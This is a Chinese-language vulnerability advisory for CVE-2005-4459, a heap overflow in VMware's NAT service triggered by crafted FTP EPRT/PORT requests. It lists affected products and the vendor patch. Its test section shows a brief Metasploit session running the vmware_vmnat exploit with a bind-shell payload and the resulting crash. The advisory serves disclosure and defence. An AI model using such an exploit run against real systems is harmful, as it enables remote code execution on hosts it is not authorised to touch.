发布日期：2005-12-21
更新日期：2005-12-21

受影响系统：

VMWare GSX Server
VMWare Workstation 5.5.0 <= build-18007
VMWare ACE
VMWare Player

描述：

---

BUGTRAQ  ID: 15998
CVE(CAN) ID: CVE-2005-4459

VMWare是一款“虚拟PC”软件，允许在一台机器上同时运行两个或多个Windows、DOS、LINUX系统。

由于Vmnat无法正确的处理特制的EPRT和PORT FTP请求，导致Windows主机的vmnat.exe和Linux系统的vmnet-natd上存在安全漏洞。恶意用户可以使用NAT联网配置在目标机器上执行任意代码。

<*来源：Tim Shelton （security-advisories@acs-inc.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=113520386818424&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

msf > use vmware_vmnat
msf vmware_vmnat(win32_bind) > exploit
[*] Starting Bind Handler.
[*] VMWare vmnat Remote Heap Exploit by Tim Shelton <security (at) acs-inc (dot) com [emai
l concealed]>
[*] 220 #### FTP Server Ready.
[*] Login as anonymous/login
[*] Sending evil buffer....
[*] No response from FTP server
[*] Exiting Bind Handler.
vmnat.exe: Access violation when writing to [2F5C2F5C] <- Controllable
Registers

建议：

---

厂商补丁：

VMWare
------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.vmware.com/download

浏览次数：3726
严重程度：0（网友投票）